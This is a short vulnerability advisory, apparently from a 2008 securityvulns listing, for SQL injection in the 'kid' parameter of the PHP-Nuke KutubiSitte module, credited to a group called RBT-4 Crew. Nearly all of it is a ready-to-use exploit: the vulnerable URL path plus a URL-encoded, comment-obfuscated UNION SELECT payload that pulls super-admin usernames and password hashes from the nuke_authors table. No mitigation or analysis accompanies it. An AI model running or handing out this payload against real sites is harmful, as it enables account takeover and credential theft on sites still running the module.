PHP-Nuke KutubiSitte "kid" SQL Injection

2008-03-09T00:00:00
ID SECURITYVULNS:DOC:19352
Type securityvulns
Reporter Securityvulns
Modified 2008-03-09T00:00:00

Description

RBT-4 Crew

rbt-4.net

PHP-Nuke KutubiSitte "kid" SQL Injection

http://www.rbt-4.net/forum/viewthread.php?forum_id=51&thread_id=3058

AUTHOR : Lovebug

modules.php?name=KutubiSitte&h_op=hadisgoster&kid=

Exploit :

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Lovebug, r080cy90r, ThE_RaV[3]N, Dir31, The_Stooge